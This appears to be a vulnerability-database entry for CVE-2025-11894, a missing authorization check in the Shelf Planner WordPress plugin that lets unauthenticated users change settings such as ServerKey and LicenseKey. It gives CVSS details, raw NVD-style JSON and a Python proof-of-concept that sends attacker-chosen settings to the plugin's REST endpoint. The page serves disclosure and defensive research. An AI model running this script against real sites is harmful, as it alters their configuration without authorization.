Security Vulnerability Report
中文
CVE-2025-11894 CVSS 5.3 MEDIUM

CVE-2025-11894

Published: 2025-11-11 04:15:45
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Shelf Planner plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several REST API endpoints in all versions up to, and including, 2.8.1. This makes it possible for unauthenticated attackers to modify several of the plugin's settings like the ServerKey and LicenseKey.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Shelf Planner插件 < 2.8.1
Shelf Planner插件 <= 2.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-11894 PoC - WordPress Shelf Planner Unauthorized Configuration Modification # Target: WordPress site with Shelf Planner plugin <= 2.8.1 TARGET_URL = "http://target-wordpress-site.com" def exploit_shelf_planner(): """ Exploit for CVE-2025-11894: Missing authorization in Shelf Planner REST API endpoints This PoC demonstrates how an unauthenticated attacker can modify plugin settings. """ # Step 1: Identify the REST API endpoint # Shelf Planner plugin registers REST API routes without capability checks api_base = f"{TARGET_URL}/wp-json/shelf-planner/v1" # Step 2: Attempt to modify ServerKey setting # This endpoint should require authentication but doesn't server_key_payload = { "key": "server_key", "value": "attacker_controlled_server" } response = requests.post( f"{api_base}/settings", json=server_key_payload, headers={ "Content-Type": "application/json", "X-WordPress-Nonce": "" # Not required due to missing auth check } ) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") # Step 3: Attempt to modify LicenseKey setting license_key_payload = { "key": "license_key", "value": "MALICIOUS-LICENSE-KEY" } response = requests.post( f"{api_base}/settings", json=license_key_payload, headers={"Content-Type": "application/json"} ) print(f"[*] License Key Modification Response: {response.text}") if __name__ == "__main__": exploit_shelf_planner()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11894", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:44.613", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Shelf Planner plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several REST API endpoints in all versions up to, and including, 2.8.1. This makes it possible for unauthenticated attackers to modify several of the plugin's settings like the ServerKey and LicenseKey."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/shelf-planner/#developers", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/107031b3-5071-490a-a8f7-060212b1724c?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.